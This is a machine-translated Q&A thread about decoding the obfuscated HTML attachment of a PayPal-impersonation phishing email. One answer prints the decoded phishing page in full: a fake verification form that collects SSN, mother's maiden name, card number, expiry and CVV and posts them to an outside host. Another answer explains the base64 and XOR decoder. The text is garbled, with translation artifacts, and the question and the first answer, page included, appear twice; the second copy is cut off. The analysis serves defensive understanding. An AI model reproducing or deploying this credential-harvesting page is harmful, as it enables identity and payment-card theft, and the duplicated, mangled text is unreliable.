Javascript 高级 Unicode Encode/Decode
Javascript Advanced Unicode Encode/Decode
所以我在我的垃圾邮件文件夹中四处寻找,发现了这条消息:
Dеаг Vаluеd ΜеmЬег,
Wе аѕκ fοг уοuг tіmе tο сагеfullу геаd thіѕ nοtіfісаtіοn ѕеnt Ьу οuг
Αссοunt Rеνіеw Τеаm.
Оuг ѕесuгіtу ѕуѕtеm hаѕ Ьlοсκеd unuѕuаl сhагgеѕ tο а сгеdіt сагd
lіnκеd tο уοuг ассοunt.
Αn іntгuѕіοn іntο уοuг ассοunt hаѕ Ьееn dеtесtеd whісh ѕhοwѕ thаt ѕοmеοnе tгіеd tο ассеѕѕ уοuг ΡауΡаl ассοunt wіthοut уοuг
ρегmіѕѕіοn. wе hаνе lіmіtеd ассеѕѕ tο уοuг ассοunt duе tο thіѕ
ρгοЬlеm. Μοгеονег, wе hаνе ѕеnt уοu аn аttасhmеnt whісh сοntаіnѕ аll
thе nесеѕѕагу ѕtеρѕ іn οгdег tο геѕtοге уοuг ассοunt ассеѕѕ. Ρlеаѕе
dοwnlοаd аnd ορеn іt іn уοuг Ьгοwѕег.
Ρlеаѕе dο undегѕtаnd thаt thіѕ іѕ а ѕесuгіtу mеаѕuге tаκеn wіth іntеntіοn tο ρгοtесt уοu аnd уοuг ассοunt. Wе аροlοgіzе fοг аnу
іnсοnνеnіеnсе.
Ѕіnсегеlу, ΡауΡаl Αссοunt Rеνіеw Τеаm
电子邮件的附件是 "Verification_2015.html"
代码对于 'Whosebug' 来说太大了,所以可以在这里找到:http://pastebin.com/UxcGwSv7
我尝试使用我在互联网上发现的几个解码器对其进行解码,但 none 有效,我猜这里正在进行一些我无法弄清楚的高级 javascript 编码。
有人可以:
- (A) 指出正确的方向来解码这个。
- (B) 向我解释如何解码它以及它的内部工作原理。
- 或 (C) 帮我解码。
先谢谢你,
-肖恩 D.
混淆 JavaScript 产生 JavaScript(而不是 运行ning 作为某种解释器,例如)很容易解码!只需寻找将转换后的字符串变成某种“真实世界”动作的部分。这里是document.write,可以直接用console.log和运行代替HTML。
这里是 运行 通过 tidyhtml:
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="generator" content=
"HTML Tidy for Linux (vers 25 March 2009), see www.w3.org">
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii">
<title>Account Verification</title>
<style type="text/css">
<!td {font-family: verdana,arial,helvetica,sans-serif;font-size:12px;color: #000000;}.pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size:18px;font-weight: bold;color: #003366;} hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left:#fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;}hr.space {width:139px; border-color:#FFFFFF; };.pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size:11px;color: #aaaaaa;}.pp_sidebartextbold {font-family:verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color:#003366;} .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size:11px;color: #003366;} .ppem106 {font-weight: 700;}submit.primary, input.submit.primary {border-left:1px solid #d5bd98; border-right:1px solid #935e0d; border-top:1px solid #d5bd98; border-bottom:1px solid #935e0d; background:#ffa822 url('orange.gif'); left}submit.primary:active, input.submit.primary:active {border:1px solid #935e0d; border-right-color:#d5bd98; border-bottom-color:#d5bd98;}input, select {border:1px solid #adc2d6;}.main_block {width: 100px; align:center-right; margin: 0 auto; }.main_block:before,.main_block:after { overflow:hidden; content:""; display:table; }.main_block:after { clear:both; }.inner_block { display: inline-block; float:center; width:100%;}.inner_block img { width:100%; height:auto; vertical-align:middle; }>
</style>
</head>
<body>
<p align="center"><font color="#FFFFFF"><span style=
"background-color: #FFFFFF">______</span></font><img border="0"
src="https://www-techinasia.netdna-ssl.com/wp-content/uploads/2012/02/paypal.jpg"
width="350" height="180"></p>
<div class="main_block">
<div class="inner_block"><img src=
"http://www.johncflood.com/wp-content/uploads/2011/10/ssl-secure-logo.png"></div>
<div class="inner_block"><img src=
"http://www.b2bonline.pl/media/cms_page_media/47/Verisign3.jpg"></div>
</div>
<table cellspacing="0" cellpadding="0" width="200" align="center"
border="0">
<tbody>
<tr valign="top">
<td width="200" style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<table cellspacing="0" cellpadding="5" width="100%" border="0">
<tbody>
<tr valign="top">
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<p align="center"> </p>
<p><b><font size="2">Please fill in the correct information for the
following fields to verify your identity.</font></b></p>
<table cellspacing="0" cellpadding="0" width="103%" border="0">
<tbody>
<tr>
<td></td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="0" width="889" border="0">
<tbody>
<tr>
<td class="pp_heading" align="center" valign="top" width="646">
<form action="http://www.linksec.su/services.php" method="post"
name="Date"><input type="hidden" name="id" value=
"44464"><input type="hidden" name="redirection" value=
""><input type="hidden" name="siteId" value="CB""><input name=
"form_charset" type="hidden" value="UTF-8">
<fieldset><legend>Personal Identification</legend>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="18">
<tr valign="bottom">
<td height="23">
<p align="left"><font face="Verdana" size="2"><span>Full
Name:</span></font></p>
</td>
<td height="1" align="right" width="367">
<p align="left"><input name="pname" tabindex="1" size="28"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="28">
<tr valign="bottom">
<td height="23">
<p align="left"><font face="Verdana" size="2"><span>Date Of
Birth:</span></font></p>
</td>
<td align="right" width="367" height="29">
<p align="left"><label for="pdobtype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pdobday" id=
"pdobday" size="1" tabindex="2">
<option value="00" selected>Day</option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select></font></label> <span>-</span> <label for=
"pdobtype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pdobmonth"
id="pdobmonth" size="1" tabindex="3">
<option value="00" selected>Month</option>
<option value="Jan">Jan</option>
<option value="Feb">Feb</option>
<option value="Mar">Mar</option>
<option value="Apr">Apr</option>
<option value="May">May</option>
<option value="Jun">Jun</option>
<option value="Jul">Jul</option>
<option value="Aug">Aug</option>
<option value="Sep">Sep</option>
<option value="Oct">Oct</option>
<option value="Nov">Nov</option>
<option value="Dec">Dec</option>
</select></font></label> <span>-</span> <label for=
"pdobtype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pdobyear" id=
"pdobyear" size="1" tabindex="3">
<option value="00" selected>Year</option>
<option value="1915">1915</option>
<option value="1916">1916</option>
<option value="1917">1917</option>
<option value="1918">1918</option>
<option value="1919">1919</option>
<option value="1920">1920</option>
<option value="1921">1921</option>
<option value="1922">1922</option>
<option value="1923">1923</option>
<option value="1924">1924</option>
<option value="1925">1925</option>
<option value="1926">1926</option>
<option value="1927">1927</option>
<option value="1928">1928</option>
<option value="1929">1929</option>
<option value="1930">1930</option>
<option value="1931">1931</option>
<option value="1932">1932</option>
<option value="1933">1933</option>
<option value="1934">1934</option>
<option value="1935">1935</option>
<option value="1936">1936</option>
<option value="1937">1937</option>
<option value="1938">1938</option>
<option value="1939">1939</option>
<option value="1940">1940</option>
<option value="1941">1941</option>
<option value="1942">1942</option>
<option value="1943">1943</option>
<option value="1944">1944</option>
<option value="1945">1945</option>
<option value="1946">1946</option>
<option value="1947">1947</option>
<option value="1948">1948</option>
<option value="1949">1949</option>
<option value="1950">1950</option>
<option value="1951">1951</option>
<option value="1952">1952</option>
<option value="1953">1953</option>
<option value="1954">1954</option>
<option value="1955">1955</option>
<option value="1956">1956</option>
<option value="1957">1957</option>
<option value="1958">1958</option>
<option value="1959">1959</option>
<option value="1960">1960</option>
<option value="1961">1961</option>
<option value="1962">1962</option>
<option value="1963">1963</option>
<option value="1964">1964</option>
<option value="1965">1965</option>
<option value="1966">1966</option>
<option value="1967">1967</option>
<option value="1968">1968</option>
<option value="1969">1969</option>
<option value="1970">1970</option>
<option value="1971">1971</option>
<option value="1972">1972</option>
<option value="1973">1973</option>
<option value="1974">1974</option>
<option value="1975">1975</option>
<option value="1976">1976</option>
<option value="1977">1977</option>
<option value="1978">1978</option>
<option value="1979">1979</option>
<option value="1980">1980</option>
<option value="1981">1981</option>
<option value="1982">1982</option>
<option value="1983">1983</option>
<option value="1984">1984</option>
<option value="1985">1985</option>
<option value="1986">1986</option>
<option value="1987">1987</option>
<option value="1988">1988</option>
<option value="1989">1989</option>
<option value="1990">1990</option>
<option value="1991">1991</option>
<option value="1992">1992</option>
<option value="1993">1993</option>
<option value="1994">1994</option>
<option value="1995">1995</option>
<option value="1996">1996</option>
<option value="1997">1997</option>
</select></font></label></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="18">
<tr valign="bottom">
<td height="23">
<p align="left"><font face="Verdana" size="2"><span>Mother's Maiden
Name:</span></font></p>
</td>
<td align="right" width="367" height="29">
<p align="left"><input name="pmmn" tabindex="3" size="28"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="34">
<tr valign="bottom">
<td>
<p align="left"><font face="Verdana" size=
"2"><span>Country:</span></font></p>
</td>
<td align="right" width="367">
<p align="left"><font color="#000000"><strong><select id="pcountry"
name="pcountry" height:="" size="1" tabindex="4">
<option selected>United States</option>
<option>Albania</option>
<option>Algeria</option>
<option>American Samoa</option>
<option>Andorra</option>
<option>Angola</option>
<option>Anguilla</option>
<option>Antarctica</option>
<option>Antigua And Barbuda</option>
<option>Argentina</option>
<option>Armenia</option>
<option>Aruba</option>
<option>Australia</option>
<option>Austria</option>
<option>Azerbaijan</option>
<option>Bahamas</option>
<option>Bahrain</option>
<option>Bangladesh</option>
<option>Barbados</option>
<option>Belarus</option>
<option>Belgium</option>
<option>Belize</option>
<option>Benin</option>
<option>Bermuda</option>
<option>Bhutan</option>
<option>Bolivia</option>
<option>Bosnia and Herzegovina</option>
<option>Botswana</option>
<option>Bouvet Island</option>
<option>Brazil</option>
<option>British Indian Ocean Territory</option>
<option>Brunei Darussalam</option>
<option>Bulgaria</option>
<option>Burkina Faso</option>
<option>Burma</option>
<option>Burundi</option>
<option>Cambodia</option>
<option>Cameroon</option>
<option>Canada</option>
<option>Cape Verde</option>
<option>Cayman Islands</option>
<option>Central African Republic</option>
<option>Chad</option>
<option>Chile</option>
<option>China</option>
<option>Christmas Island</option>
<option>Cocos (Keeling) Islands</option>
<option>Colombia</option>
<option>Comoros</option>
<option>Congo</option>
<option>Congo, the Democratic Republic of the</option>
<option>Cook Islands</option>
<option>Costa Rica</option>
<option>Cote d'Ivoire</option>
<option>Croatia</option>
<option>Cyprus</option>
<option>Czech Republic</option>
<option>Denmark</option>
<option>Djibouti</option>
<option>Dominica</option>
<option>Dominican Republic</option>
<option>East Timor</option>
<option>Ecuador</option>
<option>Egypt</option>
<option>El Salvador</option>
<option>England</option>
<option>Equatorial Guinea</option>
<option>Eritrea</option>
<option>Espana</option>
<option>Estonia</option>
<option>Ethiopia</option>
<option>Falkland Islands</option>
<option>Faroe Islands</option>
<option>Fiji</option>
<option>Finland</option>
<option>France</option>
<option>French Guiana</option>
<option>French Polynesia</option>
<option>French Southern Territories</option>
<option>Gabon</option>
<option>Gambia</option>
<option>Georgia</option>
<option>Germany</option>
<option>Ghana</option>
<option>Gibraltar</option>
<option>Great Britain</option>
<option>Greece</option>
<option>Greenland</option>
<option>Grenada</option>
<option>Guadeloupe</option>
<option>Guam</option>
<option>Guatemala</option>
<option>Guinea</option>
<option>Guinea-Bissau</option>
<option>Guyana</option>
<option>Haiti</option>
<option>Heard and Mc Donald Islands</option>
<option>Honduras</option>
<option>Hong Kong</option>
<option>Hungary</option>
<option>Iceland</option>
<option>India</option>
<option>Indonesia</option>
<option>Ireland</option>
<option>Israel</option>
<option>Italy</option>
<option>Jamaica</option>
<option>Japan</option>
<option>Jordan</option>
<option>Kazakhstan</option>
<option>Kenya</option>
<option>Kiribati</option>
<option>Korea (North)</option>
<option>Korea, Republic of</option>
<option>Korea (South)</option>
<option>Kuwait</option>
<option>Kyrgyzstan</option>
<option>Lao People's Democratic Republic</option>
<option>Latvia</option>
<option>Lebanon</option>
<option>Lesotho</option>
<option>Liberia</option>
<option>Liechtenstein</option>
<option>Lithuania</option>
<option>Luxembourg</option>
<option>Macau</option>
<option>Macedonia</option>
<option>Madagascar</option>
<option>Malawi</option>
<option>Malaysia</option>
<option>Maldives</option>
<option>Mali</option>
<option>Malta</option>
<option>Marshall Islands</option>
<option>Martinique</option>
<option>Mauritania</option>
<option>Mauritius</option>
<option>Mayotte</option>
<option>Mexico</option>
<option>Micronesia, Federated States of</option>
<option>Moldova, Republic of</option>
<option>Monaco</option>
<option>Mongolia</option>
<option>Montserrat</option>
<option>Morocco</option>
<option>Mozambique</option>
<option>Myanmar</option>
<option>Namibia</option>
<option>Nauru</option>
<option>Nepal</option>
<option>Netherlands</option>
<option>New Caledonia</option>
<option>New Zealand</option>
<option>Nicaragua</option>
<option>Niger</option>
<option>Nigeria</option>
<option>Niue</option>
<option>Norfolk Island</option>
<option>Northern Ireland</option>
<option>Northern Mariana Islands</option>
<option>Norway</option>
<option>Oman</option>
<option>Pakistan</option>
<option>Palau</option>
<option>Panama</option>
<option>Papua New Guinea</option>
<option>Paraguay</option>
<option>Peru</option>
<option>Philippines</option>
<option>Pitcairn</option>
<option>Poland</option>
<option>Portugal</option>
<option>Puerto Rico</option>
<option>Qatar</option>
<option>Reunion</option>
<option>Romania</option>
<option>Russia</option>
<option>Russian Federation</option>
<option>Rwanda</option>
<option>San Marino</option>
<option>Sao Tome and Principe</option>
<option>Saudi Arabia</option>
<option>Scotland</option>
<option>Senegal</option>
<option>Seychelles</option>
<option>Singapore</option>
<option>Slovakia</option>
<option>Slovenia</option>
<option>Solomon Islands</option>
<option>Somalia</option>
<option>South Africa</option>
<option>South Georgia and the South Sandwich Islands</option>
<option>South Korea</option>
<option>Spain</option>
<option>Sri Lanka</option>
<option>St. Helena</option>
<option>Sweden</option>
<option>Switzerland</option>
<option>Taiwan</option>
<option>Tajikistan</option>
<option>Tanzania</option>
<option>Thailand</option>
<option>Togo</option>
<option>Tokelau</option>
<option>Tonga</option>
<option>Trinidad</option>
<option>Trinidad and Tobago</option>
<option>Tunisia</option>
<option>Turkey</option>
<option>Turkmenistan</option>
<option>Uganda</option>
<option>Ukraine</option>
<option>United Arab Emirates</option>
<option>United Kingdom</option>
<option>United States</option>
<option>United States Minor Outlying Islands</option>
<option>Uruguay</option>
<option>USA</option>
<option>Uzbekistan</option>
<option>Vanuatu</option>
<option>Vatican City State (Holy See)</option>
<option>Venezuela</option>
<option>Viet Nam</option>
<option>Virgin Islands (British)</option>
<option>Virgin Islands (U.S.)</option>
<option>Wales</option>
<option>Wallis and Futuna Islands</option>
<option>Western Sahara</option>
<option>Yemen</option>
<option>Zambia</option>
<option>Zimbabwe</option>
</select></strong></font></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size=
"2"><span>State:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pstate" size="14" tabindex="5"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size=
"2"><span>City:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pcity" size="14" tabindex="6"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size=
"2"><span>Address:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><font face="Verdana"><input name="paddr" size="31"
tabindex="7"></font></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="34">
<tr valign="bottom">
<td>
<p align="left"><font face="Verdana" size="2"><span>Zip
Code:</span></font></p>
</td>
<td align="right" width="367">
<p align="left"><input name="pzip" size="10" tabindex="8"
maxlength="10"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size="2"><span>Phone
Number:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pphone" size="14" tabindex="9"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size="2"><span>Social Security
Number (SSN):</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pssn" size="14" tabindex="10"></p>
</td>
</tr>
</table>
</fieldset>
<br>
<fieldset><legend>Credit/Debit Card Verification</legend>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="29">
<tr valign="bottom">
<td height="29">
<p align="left"><font face="Verdana" size="2"><span>Card
Number:</span></font></p>
</td>
<td align="right" width="367" height="29">
<p align="left"><input name="pccn" size="16" tabindex="11"
maxlength="16" onkeypress="return numonly(this, event)"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="28">
<tr valign="bottom">
<td height="28">
<p align="left"><font face="Verdana" size="2"><span>Expiration
Date:</span></font></p>
</td>
<td align="right" width="367" height="28">
<p align="left"><label for="pcctype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pexpm" id=
"pexpm" size="1" tabindex="12">
<option value="00" selected>Month</option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select></font></label> <span>-</span> <label for=
"pcctype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pexpy" id=
"pexpy" size="1" tabindex="13">
<option value="00" selected>Year</option>
<option value="15">2015</option>
<option value="16">2016</option>
<option value="17">2017</option>
<option value="18">2018</option>
<option value="19">2019</option>
<option value="20">2020</option>
<option value="21">2021</option>
<option value="22">2022</option>
<option value="23">2023</option>
<option value="24">2024</option>
<option value="2025">2025</option>
</select></font></label> <font size="2" face=
"Verdana"><span> (Ex: 05/2015)</span></font></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="30">
<tr valign="bottom">
<td height="30">
<p align="left"><font face="Verdana" size="2"><span>Card
Verification Number (CVV2):</span></font></p>
</td>
<td align="right" width="367" height="30">
<p align="left"><input name="pcvv" size="4" tabindex="14"
maxlength="3" onkeypress="return numonly(this, event)"></p>
</td>
</tr>
</table>
<p align="center"><font color="#003366"><input type="submit"
tabindex="15" name="x01.php" value="Submit Form" class=
"primary"></font></p>
<p align="left"><font color="#003366"><font size="1">By clicking
the button "Submit Form" you confirm your identity with us. The
form is submitted instantly.</font></font></p>
<p align="left"></p>
</fieldset>
</form>
</td>
<td class="pp_heading" align="left" width="239" valign="top" style=
"padding-left: 4px;">
<table cellspacing="0" cellpadding="0" width="100%" bgcolor=
"#FFFFFF" border="0">
<tbody>
<tr>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<table cellspacing="0" cellpadding="5" width="100%" bgcolor=
"#EEEEEE" border="0">
<tbody>
<tr>
<td class="pp_sidebartextbold" align="middle">Protect Your Account
Info</td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="5" width="100%" border="0">
<tbody>
<tr>
<td class="pp_sidebartext"><br>
Make sure you never provide your password to fraudulent
persons.<br>
<br>
PayPal automatically encrypts your confidential information using
the Secure Sockets Layer protocol (SSL) with an encryption key
length of 128-bits (the highest level commercially available).<br>
<br>
For more information on protecting yourself from fraud, please
review our Security Tips at
http://www.paypal.com/securitytips<br></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<table cellspacing="0" cellpadding="5" width="100%" bgcolor=
"#EEEEEE" border="0">
<tbody>
<tr>
<td class="pp_sidebartextbold" align="middle">Protect Your
Password</td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="5" width="100%" border="0">
<tbody>
<tr>
<td class="pp_sidebartext">You should <span class=
"ppem106">never</span> give your PayPal password to anyone,
including PayPal employees.<br></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<hr class="space">
<p> </p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<br></td>
</tr>
</tbody>
</table>
</td>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
</td>
<td valign="top" width="190" style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
</td>
</tr>
</tbody>
</table>
</body>
</html>
我想我昨天才收到这条特别的消息。 Avast 在通过 Outlook 下载时最终标记了它,我想今天看看它。我收到的附件好像和你的一模一样。让我们专注于脚本。
第一行,function BDE(r),看起来像是某种解码器。查看调用此函数的第二行,显然 BDE() 是一个 base64 解码器。第二行调用将base64转成blob存入BSs.
如果您对 base64 字符串进行解码,您会发现结果并不完全可读。查看脚本的其余部分,很明显解码结果是通过另一个函数提供的,并且在被该函数转换之后,应该会产生类似于 HTML 的结果。第三行是有趣的地方。这是美化后的代码:
function XD1(r, t) {
var n = [],
o = "";
for (z = 1; 255 >= z; z++) n[String.fromCharCode(z)] = z;
for (j = z = 0; z < r.length; z++) o += String.fromCharCode(n[r.substr(z, 1)] ^ n[t.substr(j, 1)]), j = j < t.length ? j + 1 : 0;
return o
}
变量n是一个数组,初始化值为0到255,从第三行可以看出。我们称之为 "cipher table"。 o 是 return 值。第四行是完成实际工作的地方。请记住 r 是要解密的内容,而 t 是密钥。循环所做的是对内容中的每个字节,它使用该字节索引到密码 table,同时,顺序地从密钥中选择一个字节并使用它索引到密码 table。两个结果字节被异或在一起,转换为一个字符,并附加到结果中。使用 table 而不是直接进行 XORing 的原因是因为字符串 XOR 字符串不会产生有用的结果。相反,通过索引到 table,接收到两个数字,可以将它们异或在一起,并将结果转换为字符。最后,这是您的标准 XOR 密码。
关于解密循环的一个有趣的怪癖是这个片段:j = j < t.length ? j + 1 : 0。当您遇到 j 比 t.length 小一的情况时,j 仍然递增,并导致尝试对 t 使用越界索引。 substr() returns 0,当使用正确的异或密码实现时,它有效地在密钥末尾添加了一个空字符。
父脚本的最后一行将解密数据写入文档,这是一个简单的 HTML 页面,其中包含用于提交您的信用卡信息的表单。
总结:脚本base64解码,异或解密数据,写入页面
所以我在我的垃圾邮件文件夹中四处寻找,发现了这条消息:
Dеаг Vаluеd ΜеmЬег,
Wе аѕκ fοг уοuг tіmе tο сагеfullу геаd thіѕ nοtіfісаtіοn ѕеnt Ьу οuг Αссοunt Rеνіеw Τеаm.
Оuг ѕесuгіtу ѕуѕtеm hаѕ Ьlοсκеd unuѕuаl сhагgеѕ tο а сгеdіt сагd lіnκеd tο уοuг ассοunt.
Αn іntгuѕіοn іntο уοuг ассοunt hаѕ Ьееn dеtесtеd whісh ѕhοwѕ thаt ѕοmеοnе tгіеd tο ассеѕѕ уοuг ΡауΡаl ассοunt wіthοut уοuг ρегmіѕѕіοn. wе hаνе lіmіtеd ассеѕѕ tο уοuг ассοunt duе tο thіѕ ρгοЬlеm. Μοгеονег, wе hаνе ѕеnt уοu аn аttасhmеnt whісh сοntаіnѕ аll thе nесеѕѕагу ѕtеρѕ іn οгdег tο геѕtοге уοuг ассοunt ассеѕѕ. Ρlеаѕе dοwnlοаd аnd ορеn іt іn уοuг Ьгοwѕег.
Ρlеаѕе dο undегѕtаnd thаt thіѕ іѕ а ѕесuгіtу mеаѕuге tаκеn wіth іntеntіοn tο ρгοtесt уοu аnd уοuг ассοunt. Wе аροlοgіzе fοг аnу іnсοnνеnіеnсе.
Ѕіnсегеlу, ΡауΡаl Αссοunt Rеνіеw Τеаm
电子邮件的附件是 "Verification_2015.html"
代码对于 'Whosebug' 来说太大了,所以可以在这里找到:http://pastebin.com/UxcGwSv7
我尝试使用我在互联网上发现的几个解码器对其进行解码,但 none 有效,我猜这里正在进行一些我无法弄清楚的高级 javascript 编码。
有人可以:
- (A) 指出正确的方向来解码这个。
- (B) 向我解释如何解码它以及它的内部工作原理。
- 或 (C) 帮我解码。
先谢谢你,
-肖恩 D.
混淆 JavaScript 产生 JavaScript(而不是 运行ning 作为某种解释器,例如)很容易解码!只需寻找将转换后的字符串变成某种“真实世界”动作的部分。这里是document.write,可以直接用console.log和运行代替HTML。
这里是 运行 通过 tidyhtml:
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="generator" content=
"HTML Tidy for Linux (vers 25 March 2009), see www.w3.org">
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii">
<title>Account Verification</title>
<style type="text/css">
<!td {font-family: verdana,arial,helvetica,sans-serif;font-size:12px;color: #000000;}.pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size:18px;font-weight: bold;color: #003366;} hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left:#fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;}hr.space {width:139px; border-color:#FFFFFF; };.pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size:11px;color: #aaaaaa;}.pp_sidebartextbold {font-family:verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color:#003366;} .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size:11px;color: #003366;} .ppem106 {font-weight: 700;}submit.primary, input.submit.primary {border-left:1px solid #d5bd98; border-right:1px solid #935e0d; border-top:1px solid #d5bd98; border-bottom:1px solid #935e0d; background:#ffa822 url('orange.gif'); left}submit.primary:active, input.submit.primary:active {border:1px solid #935e0d; border-right-color:#d5bd98; border-bottom-color:#d5bd98;}input, select {border:1px solid #adc2d6;}.main_block {width: 100px; align:center-right; margin: 0 auto; }.main_block:before,.main_block:after { overflow:hidden; content:""; display:table; }.main_block:after { clear:both; }.inner_block { display: inline-block; float:center; width:100%;}.inner_block img { width:100%; height:auto; vertical-align:middle; }>
</style>
</head>
<body>
<p align="center"><font color="#FFFFFF"><span style=
"background-color: #FFFFFF">______</span></font><img border="0"
src="https://www-techinasia.netdna-ssl.com/wp-content/uploads/2012/02/paypal.jpg"
width="350" height="180"></p>
<div class="main_block">
<div class="inner_block"><img src=
"http://www.johncflood.com/wp-content/uploads/2011/10/ssl-secure-logo.png"></div>
<div class="inner_block"><img src=
"http://www.b2bonline.pl/media/cms_page_media/47/Verisign3.jpg"></div>
</div>
<table cellspacing="0" cellpadding="0" width="200" align="center"
border="0">
<tbody>
<tr valign="top">
<td width="200" style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<table cellspacing="0" cellpadding="5" width="100%" border="0">
<tbody>
<tr valign="top">
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<p align="center"> </p>
<p><b><font size="2">Please fill in the correct information for the
following fields to verify your identity.</font></b></p>
<table cellspacing="0" cellpadding="0" width="103%" border="0">
<tbody>
<tr>
<td></td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="0" width="889" border="0">
<tbody>
<tr>
<td class="pp_heading" align="center" valign="top" width="646">
<form action="http://www.linksec.su/services.php" method="post"
name="Date"><input type="hidden" name="id" value=
"44464"><input type="hidden" name="redirection" value=
""><input type="hidden" name="siteId" value="CB""><input name=
"form_charset" type="hidden" value="UTF-8">
<fieldset><legend>Personal Identification</legend>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="18">
<tr valign="bottom">
<td height="23">
<p align="left"><font face="Verdana" size="2"><span>Full
Name:</span></font></p>
</td>
<td height="1" align="right" width="367">
<p align="left"><input name="pname" tabindex="1" size="28"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="28">
<tr valign="bottom">
<td height="23">
<p align="left"><font face="Verdana" size="2"><span>Date Of
Birth:</span></font></p>
</td>
<td align="right" width="367" height="29">
<p align="left"><label for="pdobtype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pdobday" id=
"pdobday" size="1" tabindex="2">
<option value="00" selected>Day</option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
